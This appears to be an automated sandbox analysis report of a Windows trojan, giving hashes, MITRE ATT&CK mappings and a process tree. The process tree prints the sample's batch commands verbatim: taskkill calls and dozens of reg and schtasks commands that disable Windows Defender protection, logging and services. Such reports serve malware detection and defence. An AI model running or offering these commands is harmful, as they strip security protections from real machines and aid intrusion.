448c916483d9a19490c29bbd8286ff297d8fa1828f5626deebc82ea605e66928

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
30/09/2024, 16:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe
Size

90KB
MD5

025e0b547c344ac713a7284e17feaca7
SHA1

8272182126be5918c63e02813b60bc4a0cfecedd
SHA256

448c916483d9a19490c29bbd8286ff297d8fa1828f5626deebc82ea605e66928
SHA512

157428402028baa6c8f9d3f9c5a470b2f50369067374a8627e4c81accc925210c36dab0afd6d0e94e9f3aea37e4d0a4a1568c32c30d3c1882da55a19a75152c1
SSDEEP

1536:o7f9h0UPJP/CpICdikMLMLv5PFNg1qrX+VIOlnToIf7gIxsV3M3aOn:mliUPXC8k1nJrX+fNTBfnyM3Z

Score

10^/10

defense_evasion discovery evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe

Modifies Security services 2 TTPs 4 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

T1112

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe

Kills process with taskkill 11 IoCs

evasion

pid	Process
4200	taskkill.exe
4660	taskkill.exe
3924	taskkill.exe
4468	taskkill.exe
4380	taskkill.exe
1404	taskkill.exe
4844	taskkill.exe
5020	taskkill.exe
5044	taskkill.exe
4808	taskkill.exe
5004	taskkill.exe

Suspicious use of AdjustPrivilegeToken 11 IoCs

description	pid	Process
Token: SeDebugPrivilege	1404	taskkill.exe
Token: SeDebugPrivilege	4200	taskkill.exe
Token: SeDebugPrivilege	4844	taskkill.exe
Token: SeDebugPrivilege	5020	taskkill.exe
Token: SeDebugPrivilege	4660	taskkill.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	4808	taskkill.exe
Token: SeDebugPrivilege	3924	taskkill.exe
Token: SeDebugPrivilege	4468	taskkill.exe
Token: SeDebugPrivilege	4380	taskkill.exe
Token: SeDebugPrivilege	5004	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4788 wrote to memory of 4532	4788	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	82
PID 4788 wrote to memory of 4532	4788	025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe	82
PID 4532 wrote to memory of 1404	4532	cmd.exe	85
PID 4532 wrote to memory of 1404	4532	cmd.exe	85
PID 4532 wrote to memory of 4200	4532	cmd.exe	87
PID 4532 wrote to memory of 4200	4532	cmd.exe	87
PID 4532 wrote to memory of 4844	4532	cmd.exe	88
PID 4532 wrote to memory of 4844	4532	cmd.exe	88
PID 4532 wrote to memory of 5020	4532	cmd.exe	89
PID 4532 wrote to memory of 5020	4532	cmd.exe	89
PID 4532 wrote to memory of 4660	4532	cmd.exe	90
PID 4532 wrote to memory of 4660	4532	cmd.exe	90
PID 4532 wrote to memory of 5044	4532	cmd.exe	91
PID 4532 wrote to memory of 5044	4532	cmd.exe	91
PID 4532 wrote to memory of 4808	4532	cmd.exe	92
PID 4532 wrote to memory of 4808	4532	cmd.exe	92
PID 4532 wrote to memory of 3924	4532	cmd.exe	93
PID 4532 wrote to memory of 3924	4532	cmd.exe	93
PID 4532 wrote to memory of 4468	4532	cmd.exe	94
PID 4532 wrote to memory of 4468	4532	cmd.exe	94
PID 4532 wrote to memory of 4380	4532	cmd.exe	95
PID 4532 wrote to memory of 4380	4532	cmd.exe	95
PID 4532 wrote to memory of 5004	4532	cmd.exe	96
PID 4532 wrote to memory of 5004	4532	cmd.exe	96
PID 4532 wrote to memory of 2996	4532	cmd.exe	97
PID 4532 wrote to memory of 2996	4532	cmd.exe	97
PID 4532 wrote to memory of 5096	4532	cmd.exe	98
PID 4532 wrote to memory of 5096	4532	cmd.exe	98
PID 4532 wrote to memory of 1680	4532	cmd.exe	99
PID 4532 wrote to memory of 1680	4532	cmd.exe	99
PID 4532 wrote to memory of 4408	4532	cmd.exe	100
PID 4532 wrote to memory of 4408	4532	cmd.exe	100
PID 4532 wrote to memory of 2916	4532	cmd.exe	101
PID 4532 wrote to memory of 2916	4532	cmd.exe	101
PID 4532 wrote to memory of 4320	4532	cmd.exe	102
PID 4532 wrote to memory of 4320	4532	cmd.exe	102
PID 4532 wrote to memory of 3624	4532	cmd.exe	103
PID 4532 wrote to memory of 3624	4532	cmd.exe	103
PID 4532 wrote to memory of 1272	4532	cmd.exe	104
PID 4532 wrote to memory of 1272	4532	cmd.exe	104
PID 4532 wrote to memory of 3028	4532	cmd.exe	105
PID 4532 wrote to memory of 3028	4532	cmd.exe	105
PID 4532 wrote to memory of 2928	4532	cmd.exe	106
PID 4532 wrote to memory of 2928	4532	cmd.exe	106
PID 4532 wrote to memory of 1548	4532	cmd.exe	107
PID 4532 wrote to memory of 1548	4532	cmd.exe	107
PID 4532 wrote to memory of 2336	4532	cmd.exe	108
PID 4532 wrote to memory of 2336	4532	cmd.exe	108
PID 4532 wrote to memory of 4676	4532	cmd.exe	109
PID 4532 wrote to memory of 4676	4532	cmd.exe	109
PID 4532 wrote to memory of 4360	4532	cmd.exe	110
PID 4532 wrote to memory of 4360	4532	cmd.exe	110
PID 4532 wrote to memory of 888	4532	cmd.exe	111
PID 4532 wrote to memory of 888	4532	cmd.exe	111
PID 4532 wrote to memory of 1544	4532	cmd.exe	112
PID 4532 wrote to memory of 1544	4532	cmd.exe	112
PID 4532 wrote to memory of 4760	4532	cmd.exe	113
PID 4532 wrote to memory of 4760	4532	cmd.exe	113
PID 4532 wrote to memory of 3056	4532	cmd.exe	114
PID 4532 wrote to memory of 3056	4532	cmd.exe	114
PID 4532 wrote to memory of 4496	4532	cmd.exe	115
PID 4532 wrote to memory of 4496	4532	cmd.exe	115
PID 4532 wrote to memory of 4672	4532	cmd.exe	116
PID 4532 wrote to memory of 4672	4532	cmd.exe	116

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4788
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5F37.tmp\5F38.tmp\5F39.bat C:\Users\Admin\AppData\Local\Temp\025e0b547c344ac713a7284e17feaca7_JaffaCakes118.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM ati_service.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost32.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4200
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost86.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4844
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM sihost64.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM nslookup.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4660
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM MSVSCService.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5044
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM mscvs.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4808
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM test.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3924
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM VSC_Host_Service.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4468
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM darkgenerationminer.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4380
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM nslookup.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5004
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    3⤵
    PID:2996
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:5096
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    3⤵
    PID:1680
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    3⤵
    PID:4408
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:2916
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:4320
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3624
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:1272
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    3⤵
    - Modifies Windows Defender Real-time Protection settings
    PID:3028
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    3⤵
    PID:2928
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    3⤵
    PID:1548
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    3⤵
    PID:2336
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    3⤵
    PID:4676
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:4360
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    3⤵
    PID:888
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    3⤵
    PID:1544
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    3⤵
    PID:4760
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3⤵
    PID:3056
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    3⤵
    PID:4496
- - C:\Windows\system32\schtasks.exe
    schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    3⤵
    PID:4672
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    3⤵
    PID:3932
- - C:\Windows\system32\reg.exe
    reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    3⤵
    PID:4592
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:1672
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:4580
- - C:\Windows\system32\reg.exe
    reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    3⤵
    PID:4184
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:3468
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:4564
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:5012
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies Security services
    PID:3524
- - C:\Windows\system32\reg.exe
    reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    3⤵
    - Modifies security service
    PID:2340

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\5F37.tmp\5F38.tmp\5F39.bat

Filesize
4KB

MD5
6c45ca3f949cec63659fd6809bfe9c79

SHA1
240b7260d8d6067fd15c26b4441e1e306b68ce35

SHA256
655f29b19c8b32fea16a991b5bf7c73f3b03a43b8486781f9e9e55f392c21238

SHA512
0c42e5e038c92dddf9a5f29fc2dd5b38a0c9207f92050a10a9968acb18a0ba3f468c61217bf8881775c93ead8790fc299c0c316bfd9fee037040d2a177c212da

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads